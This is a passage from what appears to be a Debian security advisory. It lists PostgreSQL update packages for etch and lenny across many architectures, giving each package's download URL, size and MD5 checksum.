http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_mips.deb Size/MD5 checksum: 205640 c92bfb396fa0c58a97da56d9a5bce526 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_mips.deb Size/MD5 checksum: 126040 882aa5294470184e3f830f14ff1359a1 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_mips.deb Size/MD5 checksum: 198836 9064a98b60943042d990cfb30e7c725b http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_mips.deb Size/MD5 checksum: 4632418 551be2bf9b99debf88766bfdc52bdd93 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_mips.deb Size/MD5 checksum: 186436 e6c4e1afa9e4ef737d794e181f5e0649 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 295380 7fefc50eb87bc4062a0372167241c8db http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 186772 61f869fadaab59f4204ad93967224b3a http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 199166 1fc6fc9de222e028a9502d7b5321252d http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 4319674 d79e8c35ad47b770624f5839becc6dd5 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 364932 726270b7357059a2683f1d9a56a81fae http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 633368 40dee45813284ba24f6c04e844adb88f http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 631464 af03abe8f5876c9909a37f4f1661a227 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 372026 cb39ae09e19d750d43296c8bd8f5cd15 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 196706 38072bfe2aaca4f4c3fda252462a1925 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 1467470 26308f342881a841de45b3fb746e6bf7 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 211052 2a572e6a0f83840a24f41e75205ff32a http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 197676 7d3d56e7d43db5774372cdc95ec17a0d http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_mipsel.deb Size/MD5 checksum: 205966 93e6482b403d1f5a20f74cf7507e13aa powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_powerpc.deb Size/MD5 checksum: 1138360 dd81195716bec06b82a3ab37bee3a6c0 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_powerpc.deb Size/MD5 checksum: 632790 8de5609abdbb51d79463f0591ab57426 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 673790 49359be46a3d41294eef900efdb0f8a5 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 1486766 f5cad69b522469bf981843fa79f10691 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 188102 5c5c7310456b98d6a14df168a09b1227 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_powerpc.deb Size/MD5 checksum: 3771848 b63c177e4b113bf6f015a9f6da36a6e0 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 4680810 5044705621bd65f5706da71038ee9338 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 356596 9a8dcc42cf80378f38ded4ca8820992c http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 297822 b0a44552d880fe9029d521705d89c394 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 203804 657d563fe0ed9b81221abc83de6ef54b http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_powerpc.deb Size/MD5 checksum: 129404 6661532b10f17d0ed76245c2284fac96 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 374370 83bc2016f7edaa5bab30b22831f3e6d4 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_powerpc.deb Size/MD5 checksum: 134670 ccf51f43b650577bb31e78a54da78d6c http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 209110 6c7ed988f3d906d496351bc5f809f1a9 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 198170 903938be6effc066bb7ee0e5f02caf32 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 211722 caae95a5849c54874224eee0c8ca1d52 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 633332 a4affac6ba89e68caa42ff89f914ff75 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_powerpc.deb Size/MD5 checksum: 199438 7239a2f5e84489d6f57addbb6360844a http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_powerpc.deb Size/MD5 checksum: 132714 161e9af76dede8c4f86f65f56e75eec6 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_s390.deb Size/MD5 checksum: 1142270 a9f7b028790df3fa468c1c4c3c068a9a http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_s390.deb Size/MD5 checksum: 3820184 468020f8c4b47e83b2df3847f57f486d http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_s390.deb Size/MD5 checksum: 127828 be56b9cb5e2f79c9c6bf93e8c22a2da7 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_s390.deb Size/MD5 checksum: 633346 7739515af290e6c281fda2b409896a2f http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_s390.deb Size/MD5 checksum: 614508 cfee7de77ecab4c9192166f1513ca728 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_s390.deb Size/MD5 checksum: 363258 bc25e3b65a4775b9ac3b045e8b41808e http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_s390.deb Size/MD5 checksum: 4747752 27af473a35d4728c25604fa469595db6 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_s390.deb Size/MD5 checksum: 202298 4d99972056e606dc6d60f9e122a6208f http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_s390.deb Size/MD5 checksum: 187438 6ee343d02091ffc458e270e2521c30ec http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_s390.deb Size/MD5 checksum: 198148 546a62f14052cd7b3ca2754706129223 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_s390.deb Size/MD5 checksum: 132434 3afe06b52c3f278b44338f0b60d2dc85 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_s390.deb Size/MD5 checksum: 663034 b97c13fcbb556ffb691081d1e7aab32b http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_s390.deb Size/MD5 checksum: 211340 36509f8ca1e7fde071980fb6ea3dc5f5 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_s390.deb Size/MD5 checksum: 374656 a8fe1197897d5f5f0f892a2e6a07fb49 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_s390.deb Size/MD5 checksum: 208790 a2f0c57991819082821de4559a95a25f http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_s390.deb Size/MD5 checksum: 302432 43bed1c2f20c28725e6b880dd4695ea3 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_s390.deb Size/MD5 checksum: 133182 8c086be58a8219393682848a31ba5954 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_s390.deb Size/MD5 checksum: 1488100 4ef422c5c2981f86409aaf22a4a732c8 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_s390.deb Size/MD5 checksum: 198424 20d6b5bdc63fba0cd18aac9e3692c8c6 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 197498 ce19d6469e96aaeb923c9dee28f0538c http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-compat2_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 185870 c00fb9fafb0ebcd46c0601afd8d5ada3 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq4_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 292508 5699dcff917d3d4fcb5779f1aec18e8c http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpgtypes2_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 206804 b7d3469627bc8ed4aec7d7b2869b001c http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-pltcl-7.4_7.4.26-0etch1_sparc.deb Size/MD5 checksum: 133236 c8a3767ca1143972b21b174cb2fb277a http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 201862 1bd2a7fdad1c22a98948194064c2959a http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg-dev_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 370016 d03c93098aed0cafb222e9ead4c2067d http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plperl-7.4_7.4.26-0etch1_sparc.deb Size/MD5 checksum: 127908 0a614d81792f02fdd890abb3e5b91754 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-contrib-7.4_7.4.26-0etch1_sparc.deb Size/MD5 checksum: 582370 d97f2cc0bfe3e07eb02734bf0017fcf3 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-client-8.1_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 1458034 0170b94c4625c2949da771b90c25bb88 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 196410 ba2b103f4566a6b6501dfa39fa9e0b98 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 633720 65f3bdc5d197a37268d666c16980b791 http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-8.1_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 4627136 2ae39bb60634bfb797ef7aca80b8796c http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-7.4_7.4.26-0etch1_sparc.deb Size/MD5 checksum: 3696996 51cb4009fd32c3828cf6d3aaca80dd7d http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-client-7.4_7.4.26-0etch1_sparc.deb Size/MD5 checksum: 1110124 89d5fa80226a9ffe67060ce8fe6a48b1 http://security.debian.org/pool/updates/main/p/postgresql-7.4/postgresql-plpython-7.4_7.4.26-0etch1_sparc.deb Size/MD5 checksum: 131326 c2b50a6825c27ce1de1eb3712095dbfe http://security.debian.org/pool/updates/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 634892 cb73e302eb389e71cdc8b442e36944c9 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libecpg5_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 206154 68c8ab5f8d87d86dafc391d50668a819 http://security.debian.org/pool/updates/main/p/postgresql-8.1/libpq-dev_8.1.18-0etch1_sparc.deb Size/MD5 checksum: 345206 4f863879698bfdb1491087dc33fcaed4 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8.orig.tar.gz Size/MD5 checksum: 13841845 14a82ab269c114d72986daf75129aabf http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1.dsc Size/MD5 checksum: 1665 d12c48d393363e14ffbf1f8e611b3cd0 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1.diff.gz Size/MD5 checksum: 44031 fd0a3effe3d87a4ed48a87de1854171c Architecture independent packages: http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc-8.3_8.3.8-0lenny1_all.deb Size/MD5 checksum: 2140236 72b025b1f3b64a3c3f0e1a135c5862d4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib_8.3.8-0lenny1_all.deb Size/MD5 checksum: 240748 f0b071cad328759e58621d07ff413b9a http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client_8.3.8-0lenny1_all.deb Size/MD5 checksum: 240848 e3cb10ca2f54100389d5ca941252eb06 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-doc_8.3.8-0lenny1_all.deb Size/MD5 checksum: 240690 fb2d66d14bda224779dd974e92d70fd9 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql_8.3.8-0lenny1_all.deb Size/MD5 checksum: 240882 f16537d67137730a4025b5d52ce3798e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 259604 a469fd8bbdbd670a740ba071e3cb33f9 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 466306 8e072dfa400bfacadef4538966e6990b http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 606938 fd812a88b9c5764c6041086b4a55d10f http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 249784 b60a85361f52ec7c5c1f93f8414e582a http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 377110 9640f85d0e35aaf0462789cbc055dacb http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 270722 3e321cf9fc968fcc36f0ef65964d5aa2 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 269958 df323e8f23c748b0e6473f0bf7e22fb2 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 1690662 b398b51cff5bfd521b5b771a790eed3a http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 814574 7024653f3e069f715a8c0a0d6dc40740 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 268050 edd46d36d1aac5af12d1b21a48f463a1 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 464204 b6fcc60bf794494de185ff38c6a4fb53 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 261160 cd0a0334cc03e61af6b318e758af7d45 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_alpha.deb Size/MD5 checksum: 5255622 ef15387fb5234dc335093ec06fe61c1b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 262090 e3f420bfba3a84a3fba95a4f8bc584e4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 813482 a365fd323ff6dae2c533dbae83449e35 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 259602 b97bd9b55ad2cda9e35274a652362ae4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 248766 cba413a638d8d0282569381dd3ef2a5b http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 1687032 e58d273e75992c29d7f6092d79164a10 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 378250 8a130804ab23615dd72403347ff6651e http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 5345480 a82350903c9710ec049747f5d74ecd0b http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 446844 05889d3c55a5dfff516f2ba8fe1ef3a1 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 269836 04627e7d2fb1593960a725eb7fdc1108 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 268372 11a8a8e8030f9f6c71627380ff7bbfc9 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 606054 4a2a29b3f6b997e5b077189c9ad480f2 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 270210 a92c3888ebcda5e6ce2d6a48ed360d3e http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_amd64.deb Size/MD5 checksum: 459246 99833fc1649defebb97fbba3c76043cf arm architecture (ARM) http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 450404 b9e623923a9a231cab4c644305925963 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 267158 6eb4f7cb30eaab9eb635400b3ed30f9b http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 259644 e80b48d8a4ccc52d4cf757f4af3f72b8 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 430280 3ea893984555727738e1e81746daf672 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 261384 fe467a12a68adce26dc6ec5cb058be53 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 1646974 e62979cee6b9c361ebed54b98f6daa05 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 566558 24b7a6f7c99b6598f0821b7e23874a14 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 247918 0537041c52d023be1a4c5edfcdb4f6ad http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 266374 ed27f93c3b8a613ea4f3da8c81ccfc68 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 5219534 003088694c2600d21df45280284c20b7 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 268478 e4174541915ab083f5e5aa1590e23970 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 812296 6ce802f84f06e2f1725072956993e714 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_arm.deb Size/MD5 checksum: 363784 25c105daea9b2b8f6fd1101a89d651e4 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 809624 ab2bf5a7846b943c3e4067ff75480dd3 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 5232298 f3e0b7550bd9b24eae35a13481b8bf0a http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 1650326 fd5e34fa747ad79bbb53b9cf004b8ff5 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 266422 34ee8a3c45553a47011e9457def0c288 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 247572 e7fe861c8afeaabb8e5213aea3dfdcf7 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 453836 5777d23d9b45bc0405d3de48349dc7a5 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 432386 8ec948401afa9189158af4874e3fd39b http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 271274 2fa4168a980223eddd2585d36dae5ec7 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 261416 686ac13edd1b8059e701347ec4268ac8 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 269230 3dd13a938cb0a63e332ec0968a2d9d43 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 363976 6b95aa61b5f7aea50d5592b5b2c6b68d http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 259226 8d2d7d192b279e28be32e7ea54a13aab http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_armel.deb Size/MD5 checksum: 582680 7044966f606b656ffa6a4440f5cb10c8 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 263914 098a97cdf9a6a02c5251f0cde09b1f16 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 465904 19698faa72e35687ce40b71ad800b695 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 274886 fcd64f05bbe5eacbd16abf2ee737a282 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 380578 403df81134854d2e78a442dd23cdc172 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 270222 01f708244476511ba1e49b2a77fe319f http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 621412 42acd8c0d45cde67866601979ab90312 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 448340 0004bf134ff1ab1e5cb707874fd2f76f http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 273024 2772bd07a3effe27dd2699b42ae26031 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 5793274 94ffb6b3b17aed401aec9f188926d963 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 819188 31f3642fbc3ce751a18b82d557983e20 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 1722738 916f615eb119f2a4eeb4ffec50bc04f4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 249224 60cc6cab310983bf4ae9a440c9d17218 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_hppa.deb Size/MD5 checksum: 261108 307091d57037e20ee7232f403c6a6dad i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 247882 9e2dd1e807ef99713396ed7324493d52 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 259416 615abd898f0528c5e3a8d4c77af61748 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 1657816 9e15ae86be7d7bcd4d1ae1023f366bc8 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 5228714 a0e6790f2e0baacb9894c0fe6bb627e4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 434434 990f4c1e3e1aaf24af16e369cbbebd83 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 268856 09d7c962cb2c57fc0e51f8bcd43e1ccc http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 812464 cd9f7739f1bb870c71a04f3e5d9334d7 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 570002 271807a0cd3e0b754c7ccd4c93676c97 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 451198 1bf295cd2899fde3b97ce825ea9841e1 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 266454 b07f946b8f7a2e24b40b7289d762307f http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 269470 2a1086e333a5bcf830a7109e4c1e173c http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 258384 